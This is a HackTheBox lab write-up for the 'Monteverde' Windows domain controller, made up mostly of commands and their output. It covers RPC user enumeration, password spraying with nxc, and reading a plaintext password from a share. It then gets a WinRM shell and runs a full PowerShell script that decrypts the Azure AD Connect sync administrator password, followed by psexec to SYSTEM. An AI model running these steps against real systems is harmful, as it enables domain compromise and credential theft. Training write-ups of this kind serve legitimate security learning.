WriteupsHTB — Monteverde
ADMediumWindows
HTB — Monteverde
Azure AD Connect with user enumeration via RPC. Password spraying finds default creds. Azure AD Sync password extraction for Domain Admin.
January 20, 2025HackTheBox
#AD#Azure AD#Password Spray#DCSync
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 19:43 EST
Stats: 0:01:44 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 19:45 (0:00:05 remaining)
Stats: 0:01:49 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 19:45 (0:00:06 remaining)
Nmap scan report for 10.10.10.172
Host is up (0.024s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-21 00:45:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 1s
| smb2-time:
| date: 2025-01-21T00:46:25
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 24.02 ms 10.10.14.1
2 24.14 ms 10.10.10.172
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.55 seconds
445
sh
445/tcp open microsoft-ds?sh
smbclient -N -L \\\\10.10.10.172
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbclient -N -L \\\\10.10.10.172 -U 'guest'
session setup failed: NT_STATUS_LOGON_FAILURErpc
sh
rpcclient -U "" 10.10.10.172sh
samrdump.py 10.10.10.172
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Retrieving endpoint list from 10.10.10.172
Found domain(s):
. MEGABANK
. Builtin
[*] Looking up users in domain MEGABANK
Found user: Guest, uid = 501
Found user: AAD_987d7f2f57d2, uid = 1104
Found user: mhope, uid = 1601
Found user: SABatchJobs, uid = 2602
Found user: svc-ata, uid = 2603
Found user: svc-bexec, uid = 2604
Found user: svc-netapp, uid = 2605
Found user: dgalanos, uid = 2613
Found user: roleary, uid = 2614
Found user: smorgan, uid = 2615
Guest (501)/FullName:
Guest (501)/AdminComment: Built-in account for guest access to the computer/domain
Guest (501)/UserComment:
Guest (501)/PrimaryGroupId: 514
Guest (501)/BadPasswordCount: 1
Guest (501)/LogonCount: 0
Guest (501)/PasswordLastSet: <never>
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
Guest (501)/ScriptPath:
AAD_987d7f2f57d2 (1104)/FullName: AAD_987d7f2f57d2
AAD_987d7f2f57d2 (1104)/AdminComment: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
AAD_987d7f2f57d2 (1104)/UserComment:
AAD_987d7f2f57d2 (1104)/PrimaryGroupId: 513
AAD_987d7f2f57d2 (1104)/BadPasswordCount: 0
AAD_987d7f2f57d2 (1104)/LogonCount: 11
AAD_987d7f2f57d2 (1104)/PasswordLastSet: 2020-01-02 17:53:24.984897
AAD_987d7f2f57d2 (1104)/PasswordDoesNotExpire: True
AAD_987d7f2f57d2 (1104)/AccountIsDisabled: False
AAD_987d7f2f57d2 (1104)/ScriptPath:
mhope (1601)/FullName: Mike Hope
mhope (1601)/AdminComment:
mhope (1601)/UserComment:
mhope (1601)/PrimaryGroupId: 513
mhope (1601)/BadPasswordCount: 0
mhope (1601)/LogonCount: 2
mhope (1601)/PasswordLastSet: 2020-01-02 18:40:05.908924
mhope (1601)/PasswordDoesNotExpire: True
mhope (1601)/AccountIsDisabled: False
mhope (1601)/ScriptPath:
SABatchJobs (2602)/FullName: SABatchJobs
SABatchJobs (2602)/AdminComment:
SABatchJobs (2602)/UserComment:
SABatchJobs (2602)/PrimaryGroupId: 513
SABatchJobs (2602)/BadPasswordCount: 0
SABatchJobs (2602)/LogonCount: 0
SABatchJobs (2602)/PasswordLastSet: 2020-01-03 07:48:46.392235
SABatchJobs (2602)/PasswordDoesNotExpire: True
SABatchJobs (2602)/AccountIsDisabled: False
SABatchJobs (2602)/ScriptPath:
svc-ata (2603)/FullName: svc-ata
svc-ata (2603)/AdminComment:
svc-ata (2603)/UserComment:
svc-ata (2603)/PrimaryGroupId: 513
svc-ata (2603)/BadPasswordCount: 0
svc-ata (2603)/LogonCount: 0
svc-ata (2603)/PasswordLastSet: 2020-01-03 07:58:31.332169
svc-ata (2603)/PasswordDoesNotExpire: True
svc-ata (2603)/AccountIsDisabled: False
svc-ata (2603)/ScriptPath:
svc-bexec (2604)/FullName: svc-bexec
svc-bexec (2604)/AdminComment:
svc-bexec (2604)/UserComment:
svc-bexec (2604)/PrimaryGroupId: 513
svc-bexec (2604)/BadPasswordCount: 0
svc-bexec (2604)/LogonCount: 0
svc-bexec (2604)/PasswordLastSet: 2020-01-03 07:59:55.863422
svc-bexec (2604)/PasswordDoesNotExpire: True
svc-bexec (2604)/AccountIsDisabled: False
svc-bexec (2604)/ScriptPath:
svc-netapp (2605)/FullName: svc-netapp
svc-netapp (2605)/AdminComment:
svc-netapp (2605)/UserComment:
svc-netapp (2605)/PrimaryGroupId: 513
svc-netapp (2605)/BadPasswordCount: 0
svc-netapp (2605)/LogonCount: 0
svc-netapp (2605)/PasswordLastSet: 2020-01-03 08:01:42.786264
svc-netapp (2605)/PasswordDoesNotExpire: True
svc-netapp (2605)/AccountIsDisabled: False
svc-netapp (2605)/ScriptPath:
dgalanos (2613)/FullName: Dimitris Galanos
dgalanos (2613)/AdminComment:
dgalanos (2613)/UserComment:
dgalanos (2613)/PrimaryGroupId: 513
dgalanos (2613)/BadPasswordCount: 0
dgalanos (2613)/LogonCount: 0
dgalanos (2613)/PasswordLastSet: 2020-01-03 08:06:10.519660
dgalanos (2613)/PasswordDoesNotExpire: True
dgalanos (2613)/AccountIsDisabled: False
dgalanos (2613)/ScriptPath:
roleary (2614)/FullName: Ray O'Leary
roleary (2614)/AdminComment:
roleary (2614)/UserComment:
roleary (2614)/PrimaryGroupId: 513
roleary (2614)/BadPasswordCount: 0
roleary (2614)/LogonCount: 0
roleary (2614)/PasswordLastSet: 2020-01-03 08:08:05.832167
roleary (2614)/PasswordDoesNotExpire: True
roleary (2614)/AccountIsDisabled: False
roleary (2614)/ScriptPath:
smorgan (2615)/FullName: Sally Morgan
smorgan (2615)/AdminComment:
smorgan (2615)/UserComment:
smorgan (2615)/PrimaryGroupId: 513
smorgan (2615)/BadPasswordCount: 0
smorgan (2615)/LogonCount: 0
smorgan (2615)/PasswordLastSet: 2020-01-03 08:09:21.629084
smorgan (2615)/PasswordDoesNotExpire: True
smorgan (2615)/AccountIsDisabled: False
smorgan (2615)/ScriptPath:
[*] Received 10 entries.
sh
kerbrute userenum -d MEGABANK.LOCAL --dc 10.10.10.172 users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 01/20/25 - Ronnie Flathers @ropnop
2025/01/20 20:15:03 > Using KDC(s):
2025/01/20 20:15:03 > 10.10.10.172:88
2025/01/20 20:15:03 > [+] VALID USERNAME: roleary@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: SABatchJobs@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: AAD_987d7f2f57d2@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: svc-netapp@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: svc-bexec@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: dgalanos@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: mhope@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: svc-ata@MEGABANK.LOCAL
2025/01/20 20:15:03 > [+] VALID USERNAME: smorgan@MEGABANK.LOCAL
2025/01/20 20:15:03 > Done! Tested 10 usernames (9 valid) in 0.033 secondspassword spraying and password reuse
sh
nxc smb 10.10.10.172 -u users.txt -p users.txt
STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs sh
nxc smb 10.10.10.172 -u SABatchJobs -p SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
nxc winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs
WINRM 10.10.10.172 5985 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
WINRM 10.10.10.172 5985 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:SABatchJobscreds
SABatchJobs:SABatchJobs
bloodhound
sh
sudo bloodhound-python -u 'SABatchJobs' -p 'SABatchJobs' -ns 10.10.10.172 -d MEGABANK.LOCAL -c allsh
zip -r MEGABANK.LOCAL.zip *.jsonshares
sh
nxc smb 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [*] Enumerated shares
SMB 10.10.10.172 445 MONTEVERDE Share Permissions Remark
SMB 10.10.10.172 445 MONTEVERDE ----- ----------- ------
SMB 10.10.10.172 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.10.10.172 445 MONTEVERDE azure_uploads READ
SMB 10.10.10.172 445 MONTEVERDE C$ Default share
SMB 10.10.10.172 445 MONTEVERDE E$ Default share
SMB 10.10.10.172 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.10.10.172 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE users$ READ sh
smbclient \\\\10.10.10.172\\"users$" -U 'MEGABANK.LOCAL/SABatchJobs'
Password for [MEGABANK.LOCAL\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020sh
smb: \mhope\> get azure.xml azure.xml
xml
cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>creds
sh
nxc smb 10.10.10.172 -u users.txt -p '4n0therD4y@n0th3r$' --continue-on-success
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\smorgan:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\dgalanos:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\svc-ata:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILUREmhope:4n0therD4y@n0th3r$
sh
nxc winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$' --continue-on-success
WINRM 10.10.10.172 5985 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)winrm
sh
evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami
megabank\mhope
user.txt
sh
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
febac519...winpeas
sh
ÉÍÍÍÍÍÍÍÍÍ͹ Cloud Credentials
È https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
C:\Users\mhope\.azure\TokenCache.dat (Azure Token Cache)
Accessed:1/3/2020 5:36:14 AM -- Size:7896
C:\Users\mhope\.azure\AzureRMContext.json (Azure RM Context)
Accessed:1/3/2020 5:35:57 AM -- Size:2794
Member of Azure Admins
sh
wget https://gist.githubusercontent.com/xpn/0dc393e9.../raw/d45633c954ee3d40be1bff82648750f516cd3b80/azuread_decrypt_msol.ps1sh
*Evil-WinRM* PS C:\Users\mhope> upload azuread_decrypt_msol.ps1ADSync
- following this and ippsec: https://blog.xpnsec.com/azuread-connect-for-redteam/
sh
*Evil-WinRM* PS C:\Users\mhope> sqlcmd -q "SELECT name FROM master.dbo.sysdatabases"
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
ADSync
(5 rows affected)The database supports the Azure AD Sync service by storing metadata and configuration data for the service. Searching we can see a table named mms_management_agent which contains a number of fields including private_configuration_xml. The XML within this field holds details regarding the MSOL user:
sh
*Evil-WinRM* PS C:\Users\mhope> sqlcmd -q "use ADSync; SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
Changed database context to 'ADSync'.
keyset_id instance_id entropy
----------- ------------------------------------ ------------------------------------
1 1852B527-DD4F-4ECF-B541-EFCCBFF29E31 194EC2FC-F186-46CF-B44D-071EB61F49CD
(1 rows affected)sh
*Evil-WinRM* PS C:\Users\mhope> sqlcmd -q "use ADSync; SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
Changed database context to 'ADSync'.
private_configuration_xml encrypted_configuration
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<adma-configuration>
<forest-name>MEGABANK.LOCAL</forest-name>
<forest-port>0</forest-port>
<forest-guid>{00000000-0000-0000-0000-000000000000}</forest-guid>
<forest-login-user>administrator</forest-login-user>
<forest-login-domain>MEGABANK.LOCAL 8AAAAAgAAABQhCBBnwTpdfQE6uNJeJWGjvps08skADOJDqM74hw39rVWMWrQukLAEYpfquk2CglqHJ3GfxzNWlt9+ga+2wmWA0zHd3uGD8vk/vfnsF3p2aKJ7n9IAB51xje0QrDLNdOqOxod8n7VeybNW/1k+YWuYkiED3xO8Pye72i6D9c5QTzjTlXe5qgd4TCdp4fmVd+UlL/dWT/mhJHve/d9zFr2EX5r5+1TLbJCzYUHqFLvvpCd1rJEr68g
(1 rows affected)- original script will trigger error
- manually inspect line by line and fix the error script
powershell
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)- the error triggers on the second line
sh
*Evil-WinRM* PS C:\Users\mhope> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
*Evil-WinRM* PS C:\Users\mhope> $client.Open()
Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 52 - Unable to locate a Local Database Runtime installation. Verify that SQL Server Express is properly installed and that the Local Database Runtime feature is enabled.)"
At line:1 char:1
+ $client.Open()
+ ~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : SqlException- fixing looking at ippsec video and from this blogpost: https://www.sqlshack.com/connecting-powershell-to-sql-server/
- now it does not trigger any error
- replace the working line to the ps1 script
sh
*Evil-WinRM* PS C:\Users\mhope> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
*Evil-WinRM* PS C:\Users\mhope> $client.Open()sh
*Evil-WinRM* PS C:\Users\mhope> upload azuread_decrypt_msol.ps1sh
*Evil-WinRM* PS C:\Users\mhope> .\azuread_decrypt_msol.ps1
AD Connect Sync Credential Extract POC (@_xpn_)
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!creds
administrator:d0m@in4dminyeah!
sh
impacket-psexec administrator:'d0m@in4dminyeah!'@10.10.10.172
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.172.....
[*] Found writable share ADMIN$
[*] Uploading file nCuZVkrY.exe
[*] Opening SVCManager on 10.10.10.172.....
[*] Creating service lycw on 10.10.10.172.....
[*] Starting service lycw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemsh
C:\Users\Administrator\Desktop> type root.txt
affccf47...Up next
EasyJan 2025
HTB — Timelapse
SMB share contains ZIP with password-protected PFX certificate. Cracked PFX used for WinRM. LAPS password read via LDAP for Administrator.
Read writeup
HardJan 2025
HTB — Flight
LFI via lang parameter captures NTLM hash with Responder. Password spray, IIS WebDAV shell upload, RunasCs for lateral movement to Domain Admin.
Read writeup
EasyJan 2025
HTB — Return
Network printer admin panel LDAP credential exfiltration via attacker-controlled server. Server Operators group membership for domain privilege escalation.
Read writeup